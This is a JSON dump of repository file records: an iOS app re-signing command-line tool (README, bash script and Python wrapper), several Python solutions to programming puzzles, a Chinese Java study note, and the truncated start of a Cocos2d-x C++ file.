[ { "alpha_fraction": 0.6461635828018188, "alphanum_fraction": 0.6588459014892578, "avg_line_length": 27.654544830322266, "blob_id": "04785db8460154305f1224c011c9a70444cd8c85", "content_id": "07b58aa68772edda7993881f7f795f2b05894b35", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1819, "license_type": "permissive", "max_line_length": 183, "num_lines": 55, "path": "/README.md", "repo_name": "colourful987/resign-brush", "src_encoding": "UTF-8", "text": "# Resign Brush\n\nresign for `*.ipa/*.app` with your own certificate and provisioning profile. Once resign, you can install app in your iPhone.\n\n## Getting Started\n\nStart by using `python3.7 resign_brush -h` to get all usage.\n\n```shell\nusage: resign_brush.py [-h] {doctor,fast-resign} ...\n\npositional arguments:\n {doctor,fast-resign}\n doctor 检查 resign brush 依赖环境\n fast-resign 使用证书和描述文件重签名应用程序包\n\noptional arguments:\n -h, --help show this help message and exit\n \n```\n\nYou can resign an app with `python3.7 resign_brush.py fast-resign` cmd. However, make sure you have an valid certificate and provisioning profile which named embedded.mobileprovision:\n\n```shell\n~# : python3.7 resign_brush.py fast-resign -h\nusage: resign_brush.py fast-resign [-h] -c CERT -p PROVISION -a APP -o OUTPUT\n\noptional arguments:\n -h, --help show this help message and exit\n -c CERT, --cert CERT 请输入有效签名的开发证书或发布证书名,支持企业证书(299$),公司证书(99$,非下面分配的开发者证书),\n 独立开发者证书(99$,仅此一号)\n -p PROVISION, --provision PROVISION\n 配套的描述文件(embedded.mobileprovision)路径,unzip your app to\n search and get it.\n -a APP, --app APP 原始应用程序包文件路径,支持 .ipa 和 .app 格式\n -o OUTPUT, --output OUTPUT\n 签名后的程序包,支持 .ipa 和 .app 格式\n```\n\n### Deploying\n\nHere Provide **setup.py**, so you can use setuptools to install it like this . \n\n```shell\npython3.7 setup.py sdist\n\npip3.7 install dist/resign-brush-1.0.0.tar.gz\n\n# now you can use resign-brush anywhere\nresign-brush -h\n```\n\n\n\n## Contributing\n\n" }, { "alpha_fraction": 0.5556249022483826, "alphanum_fraction": 0.5635824799537659, "avg_line_length": 24.579999923706055, "blob_id": "66bdd652a1ad949de78e203eefed9bdd3ed2a12c", "content_id": "6299953813f3a5d8f40a2ecb4d163533bb9cf427", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 7684, "license_type": "permissive", "max_line_length": 123, "num_lines": 250, "path": "/bin/fast-resign-brush.sh", "repo_name": "colourful987/resign-brush", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nDIR=\"$(cd \"$(dirname \"${BASH_SOURCE[0]}\")\" && pwd)\"\n\nfunction run {\n\techo \"[√] Executing command: $@\"\n\t$@\n\tif [[ $? != \"0\" ]]; then\n\t\techo \"[×] Executing the above command has failed!\"\n\t\texit 1\n\tfi\n}\n\nfunction run_at {\n\tpushd \"$1\" > /dev/null 2>&1\n\tshift > /dev/null 2>&1\n\trun \"$@\" > /dev/null 2>&1\n\tpopd > /dev/null 2>&1\n}\n\nfunction verify_certificate {\n\techo \"[∞] 开始证书验证...\"\n\tlocal cert=\"$1\"\n\tlocal search=$(security find-identity -v -p codesigning | grep \"$cert\")\n\n\tif [[ -z \"${search}\" ]]; then\n\t\techo \"[×] 签名证书 ${cert} 未找到,为你找到当前可用的证书\"\n\t\tlist_available_certificates\n\t\texit 1\n\tfi\n\n\techo \"[√] 证书验证通过\"\n}\n\nfunction list_available_certificates {\n\trun \"security find-identity -v -p codesigning\"\n}\n\nfunction create_workspace_dir {\n\tlocal dir=\"$1\"\n\n\tif [[ ! -d \"${dir}\" ]]; then\n\t echo \"[∞] 开始创建临时工作目录...\"\n\t\trun \"mkdir ${dir}\"\n\t\techo \"[√] 创建成功:${dir} \"\n\tfi\n}\n\nfunction prepare_app_package {\n\tlocal workspace_dir=\"$1\"\n\tlocal source_file=\"$2\"\n\tlocal source_ext=${source_file##*.}\n\n\t# (optional) ipa 文件转成 app 文件\n\tif [[ ${source_ext} == \"ipa\" ]]; then\n\n\t\tif [[ ! -f \"${source_file}\" ]]; then\n\t\t\techo \"[×] 未找到 ipa 应用程序,请检查路径:${source_file}\"\n\t\t\texit 1\n\t\tfi\n\t\trun_at \"${workspace_dir}\" \"unzip -qo ${source_file}\"\n\n\telif [[ ${source_ext} == \"app\" ]]; then\n\t\tif [[ ! -d \"${source_file}\" ]]; then\n\t\t\techo \"[×] 未找到 app 应用程序,请检查路径:${source_file}\"\n\t\t\texit 1\n\t\tfi\n\n\t\trun_at \"${workspace_dir}\" \"mkdir Payload\"\n\t\trun_at \"${workspace_dir}\" \"cp -rf ${source_file} Payload\"\n\telse\n\t\techo \"[×] 当前仅支持 .ipa 和 .app 程序包格式\"\n\t\texit 1\n\tfi\n}\n\nAPS_ENV=\"production\"\nfunction check_aps_environment {\n local workspace_dir=\"$1\"\n\n cd ${workspace_dir}\n # ========================= 作用域是新创建的工作区 =====================\n\tAPP=\"$(find $(pwd) -name \"*.app\" | head -n 1)\"\n\tif [[ -z \"${APP}\" ]]; then\n\t\techo \"[×] 工作区未找到可用的 .app 文件!\"\n\t\texit 1\n\tfi\n\torigin_prov_file=\"${APP}/embedded.mobileprovision\"\n\n\tsecurity cms -D -i ${origin_prov_file} > origin-embedded.plist\n\taps_env=$(/usr/libexec/PlistBuddy -c 'Print:Entitlements:aps-environment' origin-embedded.plist)\n\n\tif [[ \"${aps_env}\" != \"\" ]]; then\n\t APS_ENV=${aps_env}\n\telse\n\t echo \"[!] 应用程序无法确定包类型,使用默认签名\"\n\tfi\n # ====================================================================\n\tcd - # 恢复目录\n}\n\nfunction check_provision_file {\n local prov_file=\"$1\"\n\n # 描述文件检查\n if [[ ! \"${prov_file}\" =~ \"embedded.mobileprovision\" ]]; then\n echo \"[×] 描述文件必须以 embedded.mobileprovision 命名\"\n exit 1\n fi\n\n if [[ ! -f \"${prov_file}\" ]]; then\n echo \"[×] 未找到描述文件,请检查文件路径:${prov_file}\"\n exit 1\n fi\n}\n\n# 重签名应用程序\nfunction resign {\n\tlocal certificate_name=\"$1\"\n\tlocal provision_file=\"$2\"\n\tlocal workspace_dir=\"$3\"\n\tlocal source_file=\"$4\"\n\tlocal target_file=\"$5\"\n\n\tcd ${workspace_dir}\n\n\t# ========================= 作用域是新创建的工作区 =====================\n\tAPP=\"$(find $(pwd) -name \"*.app\" | head -n 1)\"\n\n\tif [[ -z \"${APP}\" ]]; then\n\t\techo \"[×] 工作区未找到可用的 .app 文件!\"\n\t\texit 1\n\tfi\n\n\trun \"cp ${provision_file} .\" \n\tsecurity cms -D -i ${provision_file} > embedded.plist\n\t/usr/libexec/PlistBuddy -x -c 'Print:Entitlements' embedded.plist > entitlements.plist\n\n\tpayload_dir=\"${workspace_dir}/Payload\"\n\n\t# 删除旧的签名文件\n\tfind ${payload_dir} -d -name \"_CodeSignature\" | xargs rm -rf\n\n\t# 查找要重签名的所有文件清单\n\tfind ${payload_dir} -d \\( -name \"*.app\" -o -name \"*.appex\" -o -name \"*.framework\" -o -name \"*.dylib\" \\) > resign-list.txt\n\n\tif [[ ! -f resign-list.txt ]]; then\n\t\techo \"[×] 应用中未找到可重签名的项目!\"\n\t\texit 1\n\tfi\n\n\twhile IFS='' read -r file_2_resign || [[ -n \"$file_2_resign\" ]]; do\n\t\tret=$(/usr/bin/codesign -f -s \"${certificate_name}\" --entitlements entitlements.plist \"$file_2_resign\" > /dev/null 2>&1)\n\t\tif [[ \"$ret\" =~ \"no identity found\" ]]; then\n\t\t echo \"[×] resign failed:${file_2_resign} check certificate name\"\n\t\t exit 1\n\t\tfi\n\t\techo \"[√] resign :${file_2_resign##*/}\"\n\tdone < resign-list.txt\n\n echo \"[√] app resign complete, check result.\"\n\techo \"----------------------------------------------------------------\"\n\tcodesign -vv -d \"${APP}\"\n\techo \"----------------------------------------------------------------\"\n\t# =========================\t\t\tend \t\t ======================\n\tcd - # 恢复目录\n}\n\nfunction output_target_file {\n local workspace=\"$1\"\n local output_file=\"$2\"\n\n payload_dir=\"${workspace}/Payload\"\n\n if [[ ! -d \"${payload_dir}\" ]]; then\n\t\techo \"[×] 工作区未找到 Payload 目录,导出重签名包失败\"\n\t\texit 1\n\tfi\n\n APP=$(find ${workspace} -type d | grep \".app$\" | head -n 1)\n\n\tlocal output_file_ext=\"${output_file##*.}\"\n\n\tif [[ \"${output_file_ext}\" == \"ipa\" ]]; then\n\t echo \"[∞] 正在导出重签名后的应用程序(.ipa) ...\"\n run_at \"${workspace}\" \"zip -qr Target.ipa Payload\"\n run_at \"${workspace}\" \"cp -rf Target.ipa $output_file\"\n echo \"[√] 请前往 ${output_file} 查看生成文件\"\n\telif [[ \"${output_file_ext}\" == \"app\" ]]; then\n\t echo \"[∞] 正在导出重签名后的应用程序(.app) ...\"\n run_at \"${payload_dir}\" \"cp -rf ${APP} $output_file\"\n echo \"[√] 请前往 ${output_file} 查看生成文件\"\n\telse\n\t echo \"[×] 输出文件路径请指定 ipa 或是 app!\"\n\t exit 1\n\tfi\n\n}\n\n######################################################\n#\n# 可选证书都传入,内部做区分,测试催得急,直接CV。有缘人来重写\n#\n######################################################\n# 证书和描述文件\nCERTIFICATE_NAME=\"$1\"\nEMBEDDED_MOBILEPROVISION_FILE=\"$2\"\n\n# 要重签名的程序包,支持 app 和 ipa\nSOURCE_FILE=\"$3\"\n# 重签名完的目标程序包,可以是 app 和 ipa\nTARGET_FILE=\"$4\"\n\n# 创建工作目录\nTMP_WORKSPACE_DIR=\"/tmp/resign-brush-\"$(uuidgen)\ncreate_workspace_dir \"${TMP_WORKSPACE_DIR}\"\n\n# 准备 app 应用程序包,如果是 ipa 则要转成 app 文件\nprepare_app_package \"${TMP_WORKSPACE_DIR}\" \"${SOURCE_FILE}\"\n\n# 检查安装的应用程序包是什么环境\ncheck_aps_environment \"${TMP_WORKSPACE_DIR}\"\n\n# 根据环境确定用什么证书和描述文件\nif [[ \"${APS_ENV}\" == \"development\" ]]; then\n if [[ \"${CERTIFICATE_NAME}\" =~ \"Developer\" ]]; then\n echo \"[√] 检测到传入的应用程序包为开发版本,请确保你的 ${CERTIFICATE_NAME} 证书也为开发证书\"\n else\n echo \"[×] 检测到传入的应用程序包为开发版本,你的证书 ${CERTIFICATE_NAME} 非开发证书,不符合要求!\"\n fi\nelse\n if [[ \"${CERTIFICATE_NAME}\" =~ \"Distribution\" ]]; then\n echo \"[√] 检测到传入的应用程序包为发布版本,请确保你的 ${CERTIFICATE_NAME} 证书也为发布证书\"\n else\n echo \"[×] 检测到传入的应用程序包为发布版本,你的证书 ${CERTIFICATE_NAME} 非发布证书,不符合要求!\"\n fi\n\nfi\n\n# 查询可签名证书(配置文件用默认自带的)\nverify_certificate \"${CERTIFICATE_NAME}\"\n\n# 检查描述文件命名是否正确,是否存在\ncheck_provision_file \"${EMBEDDED_MOBILEPROVISION_FILE}\"\n\n# 重签名\nresign \"${CERTIFICATE_NAME}\" \"${EMBEDDED_MOBILEPROVISION_FILE}\" \"${TMP_WORKSPACE_DIR}\" \"${SOURCE_FILE}\"\n\n# 将重签名的程序包放到指定位置,若为 ipa 还需要做一个转换\noutput_target_file \"${TMP_WORKSPACE_DIR}\" \"${TARGET_FILE}\"\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n" }, { "alpha_fraction": 0.555831253528595, "alphanum_fraction": 0.5682381987571716, "avg_line_length": 21.38888931274414, "blob_id": "d0b54900db934cedd3b1cd7d8043de4ad7a490e1", "content_id": "a911df80ab2032d53b43341a4036f0ffc5da8adb", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 403, "license_type": "permissive", "max_line_length": 50, "num_lines": 18, "path": "/setup.py", "repo_name": "colourful987/resign-brush", "src_encoding": "UTF-8", "text": "from setuptools import setup, find_packages\n\nsetup(\n name='resign-brush',\n version='1.0.0',\n author='pmst',\n author_email='[email protected]',\n # url='https://',\n packages=find_packages(),\n package_data={'': ['cert/*', 'bin/*.sh']},\n install_requires=[\n ],\n python_requires=\">=3.6\",\n entry_points={'console_scripts': [\n 'resign-brush = resign_brush:brush_entry',\n ]}\n\n)\n" }, { "alpha_fraction": 0.26279863715171814, "alphanum_fraction": 0.32081910967826843, "avg_line_length": 20.69230842590332, "blob_id": "c113ecbb867c4f0e1b8bd0822070b79f5fd92c58", "content_id": "036d5e2855c944ffe6f217671b66f6c0a15d6310", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 297, "license_type": "permissive", "max_line_length": 49, "num_lines": 13, "path": "/__version__.py", "repo_name": "colourful987/resign-brush", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\r\n# -*- coding: utf-8 -*-\r\n\r\n\"\"\"\r\n-------------------------------------------------\r\n File Name: __version__\r\n Description :\r\n Author : pmst\r\n CreateDate: 2020/19/25 20:58\r\n-------------------------------------------------\r\n\"\"\"\r\n\r\n__version__ = '1.0.0'" }, { "alpha_fraction": 0.7237569093704224, "alphanum_fraction": 0.7237569093704224, "avg_line_length": 24.809524536132812, "blob_id": "6f5242843308b08ab042533eddab1979b505bf52", "content_id": "e152b1b13b9d231058456e38cc830b081f22d803", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 605, "license_type": "permissive", "max_line_length": 64, "num_lines": 21, "path": "/configs/brush_configs.py", "repo_name": "colourful987/resign-brush", "src_encoding": "UTF-8", "text": "import os\n\n# 配置文件完整路径\nBRUSH_CONFIGS_FILE_PATH = os.path.abspath(__file__)\n\n# 配置文件目录\nBRUSH_CONFIGS_DIR = os.path.dirname(BRUSH_CONFIGS_FILE_PATH)\n\n# 工作区目录\nBRUSH_WORKSPACE = os.path.dirname(BRUSH_CONFIGS_DIR)\n\n# bin 目录\nBRUSH_BIN_DIR = os.path.join(BRUSH_WORKSPACE, \"bin\")\n\n# brush core 目录\nBRUSH_CORE_DIR = os.path.join(BRUSH_WORKSPACE, \"brush_core\")\n\n# 证书 描述文件目录\nBRUSH_CERT_DIR = os.path.join(BRUSH_WORKSPACE, \"cert\")\nBRUSH_CERT_DEBUG_DIR = os.path.join(BRUSH_CERT_DIR, \"debug\")\nBRUSH_CERT_INHOUSE_DIR = os.path.join(BRUSH_CERT_DIR, \"inhouse\")\n\n" }, { "alpha_fraction": 0.6043605804443359, "alphanum_fraction": 0.61024010181427, "avg_line_length": 30.64341163635254, "blob_id": "6793b9dc887cc5ce32873ebace4873d2f916863a", "content_id": "c59992a8c8297a47a7fa78ae6dbd86851ea14c2f", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4485, "license_type": "permissive", "max_line_length": 153, "num_lines": 129, "path": "/resign_brush.py", "repo_name": "colourful987/resign-brush", "src_encoding": "UTF-8", "text": "import argparse\nimport subprocess\nimport sys\nimport re\nfrom configs.brush_configs import *\n\n\ndef run_shell(shell):\n cmd = subprocess.Popen(shell, stdin=subprocess.PIPE, stderr=sys.stderr, close_fds=True,\n stdout=sys.stdout, universal_newlines=True, shell=True, bufsize=1)\n cmd.communicate()\n return cmd.returncode\n\n\ndef find_executable(executable):\n path = os.environ['PATH']\n paths = path.split(os.pathsep)\n base, ext = os.path.splitext(executable)\n if sys.platform == 'win32' and not ext:\n executable = executable + '.exe'\n\n if os.path.isfile(executable):\n return executable\n\n for p in paths:\n full_path = os.path.join(p, executable)\n if os.path.isfile(full_path):\n return full_path\n\n return None\n\n\ndef doctor_check_required_cmds():\n find_res = find_executable(\"ios-deploy\")\n if find_res is None:\n print('[×] ios-deploy is not installed, You can use homebrew install it easily.')\n else:\n print('[√] ios-deploy is installed, locate in {cmd}'.format(cmd=find_res))\n\n find_res = find_executable(\"ideviceinstaller\")\n if find_res is None:\n print('[×] libimobiledevice is not installed, You can use homebrew install it easily.')\n else:\n print('[√] libimobiledevice is installed, locate in {cmd}'.format(cmd=find_res))\n\n\ndef doctor_check_certificats():\n cmd = \"security find-identity -v -p codesigning\"\n (status, output) = subprocess.getstatusoutput(cmd)\n if status != 0:\n print('[×] security find-identity failed')\n return\n\n ids = {}\n for current in output.split(\"\\n\"):\n sha1obj = re.search(\"[a-zA-Z0-9]{40}\", current)\n nameobj = re.search(\".*\\\"(.*)\\\"\", current)\n\n if sha1obj is None or nameobj is None:\n continue\n sha1 = sha1obj.group()\n name = nameobj.group(1)\n ids[sha1] = name\n\n print(\"\\t------------------------------------ Identity List -----------------------------------\")\n for name in ids:\n print(\"\\t{name} : {sha1}\".format(name=name, sha1=ids[name]))\n print(\"\\t--------------------------------------------------------------------------------------\")\n\n\ndef run_doctor(args):\n \"\"\"\n 检查环境配置:内置证书是否安装,ios-deploy 和 libimobiledevice 三方库是否安装\n :param args:\n :return:\n \"\"\"\n # 检查 ios-deploy 和 libimobiledevice\n doctor_check_required_cmds()\n\n # 检查证书是否安装\n doctor_check_certificats()\n\n\ndef fast_resign(args):\n resign_script = os.path.join(BRUSH_BIN_DIR, \"fast-resign-brush.sh\")\n\n certificate = args.cert\n prov_file = args.provision\n\n cmd = 'sh \"{script}\" \"{cert}\" \"{provision}\" \"{app}\" \"{output}\"'.format(\n script=resign_script,\n cert=certificate,\n provision=prov_file,\n app=args.app,\n output=args.output)\n\n status = run_shell(cmd)\n\n if status == 0:\n print(\"✿✿ヽ(°▽°)ノ✿ 重签名成功\")\n else:\n print(\"(灬ꈍ ꈍ灬) 重签名失败\")\n exit(status)\n\n\ndef brush_entry():\n \"\"\"\n 脚本选项解析,当前支持 doctor, resign 选项\n \"\"\"\n parser = argparse.ArgumentParser()\n sub_parsers = parser.add_subparsers()\n\n doctor_parser = sub_parsers.add_parser(\"doctor\", help=\"检查 resign brush 依赖环境\")\n doctor_parser.set_defaults(callback=run_doctor)\n doctor_parser.add_argument(\"--verbose\", action=\"store_true\", help=\"输出详细的检查日志\")\n\n fast_resign_parser = sub_parsers.add_parser(\"fast-resign\", help=\"使用证书和描述文件重签名应用程序包\")\n fast_resign_parser.set_defaults(callback=fast_resign)\n fast_resign_parser.add_argument(\"-c\", \"--cert\", help=\"请输入有效签名的开发证书或发布证书名,支持企业证书(299$),公司证书(99$,非下面分配的开发者证书),独立开发者证书(99$,仅此一号)\", required=True)\n fast_resign_parser.add_argument(\"-p\", \"--provision\", help=\" 配套的描述文件(embedded.mobileprovision)路径,unzip your app to search and get it.\", required=True)\n fast_resign_parser.add_argument(\"-a\", \"--app\", help=\"原始应用程序包文件路径,支持 .ipa 和 .app 格式\", required=True)\n fast_resign_parser.add_argument(\"-o\", \"--output\", help=\"签名后的程序包,支持 .ipa 和 .app 格式\", required=True)\n\n args = parser.parse_args()\n args.callback(args)\n\n\nif __name__ == '__main__':\n brush_entry()\n" } ]
6
jean-edouard-boulanger/UTC-Bloomberg-Code.B
https://github.com/jean-edouard-boulanger/UTC-Bloomberg-Code.B
f51fc7c7289994b5ea6aa5b17667539afa83bd0e
8d1cbc33d23dae2139ce298db6a19c8e8395da6d
a093ca70b844c203a23e468efbf04fc268379b19
refs/heads/master
2016-09-15T21:06:15.503897
2015-03-22T21:15:22
2015-03-22T21:15:22
32,606,709
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6020997166633606, "alphanum_fraction": 0.6146981716156006, "avg_line_length": 26.22857093811035, "blob_id": "cfe7045ad7f6a21480cf30acfebab7e3cd273fbc", "content_id": "a3a45c338b7d7fa3c02ffe13c017a3fbca86a2aa", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1905, "license_type": "no_license", "max_line_length": 95, "num_lines": 70, "path": "/7-which-books-to-read/solution.py", "repo_name": "jean-edouard-boulanger/UTC-Bloomberg-Code.B", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\nimport sys\n\n\ndef count_books_to_read(friends, source, books, max_separation_degree):\n explored = []\n books_to_read = []\n books_already_read = []\n\n to_explore = [source]\n to_explore_count = 1\n current_degree = 0\n\n if source in books:\n books_already_read += books[source]\n\n while len(to_explore) > 0 and current_degree <= max_separation_degree:\n\n current_person = to_explore.pop()\n if current_person in friends:\n current_person_friends = friends[current_person]\n for friend in current_person_friends:\n if friend not in explored:\n to_explore.insert(0, friend)\n\n if current_person in books:\n current_person_books = books[current_person]\n for book in current_person_books:\n if book not in books_already_read and book not in books_to_read:\n books_to_read.append(book)\n\n to_explore_count -= 1\n if to_explore_count == 0:\n current_degree += 1\n to_explore_count = len(to_explore)\n\n return len(books_to_read)\n\n\n\ndata = sys.stdin.readlines()\n\nsource = data[0].rstrip()\nmax_separation_degree = int(data[1].rstrip())\nlinks_count = int(data[2].rstrip())\nbook_lists_count = int(data[3].rstrip())\n\nfriends = dict()\nlinks = [link.rstrip() for link in data[4:4 + links_count]]\n\nfirst_book_idx = 4 + links_count\nbooks_read = [book.rstrip() for book in data[first_book_idx:first_book_idx + book_lists_count]]\n\nfor link in links:\n real_link = link.split(\"|\")\n p1 = real_link[0]\n p2 = real_link[1]\n if p1 not in friends:\n friends[p1] = []\n friends[p1].append(p2)\n\nbooks = dict()\nfor book_link in books_read:\n real_book_link = book_link.split(\"|\")\n p = real_book_link[0]\n books[p] = real_book_link[1:]\n\n\nprint count_books_to_read(friends, source, books, max_separation_degree)" }, { "alpha_fraction": 0.6177908182144165, "alphanum_fraction": 0.6295210123062134, "avg_line_length": 21.755556106567383, "blob_id": "928e5e2a4668bb3a09d38ea3c825cdc08c727923", "content_id": "8187ccfc9f98e487559e029847e9db639dd450bd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1023, "license_type": "no_license", "max_line_length": 61, "num_lines": 45, "path": "/4-elevators/solution.py", "repo_name": "jean-edouard-boulanger/UTC-Bloomberg-Code.B", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\nimport sys\n\n\ndata = sys.stdin.readlines()\n\ntop_floor_number = int(data[0])\nelevators = data[2:]\n\nfor i in range(0, len(elevators)):\n elevators[i] = [int(x) for x in elevators[i].split()]\n\nreachable_floors = dict()\nfor elevator in elevators:\n for floor in elevator:\n if floor not in reachable_floors:\n reachable_floors[floor] = []\n reachable_floors[floor] += elevator\n reachable_floors[floor].remove(floor)\n\nto_explore = [0]\nto_explore_count = 1\ndepth = 0\n\nexplored = []\nrides_count = 0\nwhile len(to_explore) > 0:\n\n current_floor = to_explore.pop()\n\n if current_floor == top_floor_number:\n print str(depth)\n break\n\n next_floors = reachable_floors[current_floor]\n for floor in next_floors:\n if floor not in explored and floor not in to_explore:\n to_explore.insert(0, floor)\n\n explored += [current_floor]\n to_explore_count -= 1\n if to_explore_count == 0:\n to_explore_count = len(to_explore)\n depth += 1" }, { "alpha_fraction": 0.4915032684803009, "alphanum_fraction": 0.5045751929283142, "avg_line_length": 20.885713577270508, "blob_id": "66af9c9b715cf5001832f0606150f3b77e451234", "content_id": "0101d74ece6027d5c2a03dec171140de5d0f0bdb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 765, "license_type": "no_license", "max_line_length": 62, "num_lines": 35, "path": "/3-alice-swamp/solution.py", "repo_name": "jean-edouard-boulanger/UTC-Bloomberg-Code.B", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\nimport sys\n\ndata = sys.stdin.readlines()\nlines = data[1:]\ngrid = []\nfor line in lines:\n cells = [int(x) for x in line.split(\" \")]\n grid.append(cells)\n\nN = len(grid)\n\nfor y in reversed(range(0, N)):\n for x in reversed(range(0, N)):\n if x == y == (N - 1):\n continue\n\n min_cost = sys.maxint\n current_cell_cost = grid[y][x]\n\n if x < N - 1:\n hor_move_cost = current_cell_cost + grid[y][x + 1]\n\n if hor_move_cost < min_cost:\n min_cost = hor_move_cost\n\n if y < N - 1:\n ver_move_cost = current_cell_cost + grid[y + 1][x]\n if ver_move_cost < min_cost:\n min_cost = ver_move_cost\n\n grid[y][x] = min_cost\n\nprint grid[0][0]" }, { "alpha_fraction": 0.6018957495689392, "alphanum_fraction": 0.6161137223243713, "avg_line_length": 20.149999618530273, "blob_id": "66585b8a4d67f108e0850118e5552eddeb2833a3", "content_id": "a0ee5935f7971f3b986991728e46db69ab350829", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 422, "license_type": "no_license", "max_line_length": 58, "num_lines": 20, "path": "/1-tripple-check/solution.py", "repo_name": "jean-edouard-boulanger/UTC-Bloomberg-Code.B", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\nimport sys\n\ndata = sys.stdin.readlines()\nwords = data[1:]\n\nword_length = len(words[0]) - 1\nresult_word = \"\"\n\nfor i in range(0, word_length):\n letter_count = dict()\n for word in words:\n letter = word[i]\n if letter not in letter_count:\n letter_count[letter] = 0\n letter_count[letter] += 1\n result_word += max(letter_count, key=letter_count.get)\n\nprint(result_word)" }, { "alpha_fraction": 0.5869565010070801, "alphanum_fraction": 0.6014492511749268, "avg_line_length": 15.853658676147461, "blob_id": "970eadd760ace73181864dbc98385976ced0d989", "content_id": "0d88ed1466658268f140a296db81ca5a26a0ec30", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 690, "license_type": "no_license", "max_line_length": 39, "num_lines": 41, "path": "/5-matching-gloves/solution.py", "repo_name": "jean-edouard-boulanger/UTC-Bloomberg-Code.B", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\nimport sys\n\n\ndef is_palindrome(word):\n return word == reverse(word)\n\n\ndef reverse(word):\n return word[::-1]\n\ndata = sys.stdin.readlines()\nN = int(data[0])\ngloves = [x.rstrip() for x in data[1:]]\n\ngloves_count = dict()\n\nfor glove_name in gloves:\n\n if is_palindrome(glove_name):\n continue\n\n key = glove_name\n if key not in gloves_count:\n key = reverse(glove_name)\n\n if key not in gloves_count:\n gloves_count[key] = 1\n else:\n gloves_count[key] += 1\n\n\ntotal_pair_gloves = 0\nfor k, v in gloves_count.items():\n if v % 2 > 0:\n total_pair_gloves = -1\n break\n total_pair_gloves += v / 2\n\nprint total_pair_gloves" }, { "alpha_fraction": 0.5403226017951965, "alphanum_fraction": 0.5564516186714172, "avg_line_length": 17.649999618530273, "blob_id": "3ad08bf7c3bf88bf4b7e766d2f3e68e039bc179f", "content_id": "4640d41ecb2313cb20b5a6730766d8c31dfa6139", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 372, "license_type": "no_license", "max_line_length": 44, "num_lines": 20, "path": "/2-twin-primes/solution.py", "repo_name": "jean-edouard-boulanger/UTC-Bloomberg-Code.B", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\nimport sys\n\n\ndef is_prime(mx):\n for d in range(2, mx):\n if mx % d == 0:\n return False\n return True\n\n\ndef largest_twin_primes(ubound):\n for x in reversed(range(3, ubound + 1)):\n if is_prime(x) and is_prime(x - 2):\n return str(x - 2) + \",\" + str(x)\n\n\nK = int(sys.stdin.readline())\nprint(largest_twin_primes(K))" } ]
6
jskyzero/Languages
https://github.com/jskyzero/Languages
5e26c224c9e70da3476312146c97b5738b6a7ee9
2769d56a6ba95da0301acdee06f1e21eebcf44c4
6f03f61d8b2e0669294a54686f1bca6649e0fa4b
refs/heads/master
2018-10-27T01:22:30.529386
2018-10-26T02:39:28
2018-10-26T02:39:28
139,727,781
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7030878663063049, "alphanum_fraction": 0.7268408536911011, "avg_line_length": 30.22222137451172, "blob_id": "5e3df8e727fd071e0f605affb14255c75f332b37", "content_id": "1895e19e36f2fc0efb6470d9e3dd2e2d9180f687", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1470, "license_type": "permissive", "max_line_length": 121, "num_lines": 27, "path": "/java/hardwork/hardway/README.md", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "## 面向对象基本概念\n1. 对象,对象是一个状态和行为的`software bundle`。\n2. 类,类是创建对象的蓝图或者原型。\n3. 继承,集成提供了一种强大而自然的方式来组织和结构化你的软件。\n4. 接口,接口是类和外界间的`contract`。\n5. 包,包是用逻辑方式组织类和接口的一个命名空间。\n\n\n### 语言基础\n1. 变量分类,实例/类变量(非静态/静态),本地变量,参数\n2. 变量命名,避免以`_`和`$`开头,不要使用缩写,多个单词第一个小写其余大写开头,常量全大写用下划线连接。E.G.`static final int NUM_GEARS = 6`\n3. 主要数据类型,默认值,赋值方法,请参考[这个](http://docs.oracle.com/javase/tutorial/java/nutsandbolts/datatypes.html)\n4. 数组,初始化,拷贝`System.arraycopy(Object src, int srcPos, Object dest, int destPos, int length)`,`java.util.Array`中有更多对数组的操作。\n5. 操作符。\n6. 控制流`if else`, `switch`, `while`, `for`, `break`, `continue`, `return`\n\n### 类和对象\n1. 类,声明属性/方法\n2. 对象,使用类创造对象\n3. 嵌套类,匿名类(声明即使用)\n4. Lambda表达式\n5. 枚举类型\n\n### 注解\n1. 格式,`@SuppressWarnings(value = \"unchecked\")`\n2. 何时应该使用,在声明类,域,方法和其他程序元素的时候\n3. 其余部分请参考[源介绍](http://docs.oracle.com/javase/tutorial/java/annotations/declaring.html)" }, { "alpha_fraction": 0.666208803653717, "alphanum_fraction": 0.6703296899795532, "avg_line_length": 17.225000381469727, "blob_id": "f6b1e01d2f69c7f6fe66790f00199b6d5dd0f932", "content_id": "96aaf3b1676928aae377696fc272aa3721cd1d04", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 728, "license_type": "permissive", "max_line_length": 59, "num_lines": 40, "path": "/cplusplus/projects/Cocos2dx/hardwork/homework/week15/Classes/Global.cpp", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "#include \"Global.h\"\n\n#include <regex>\nusing std::regex;\nusing 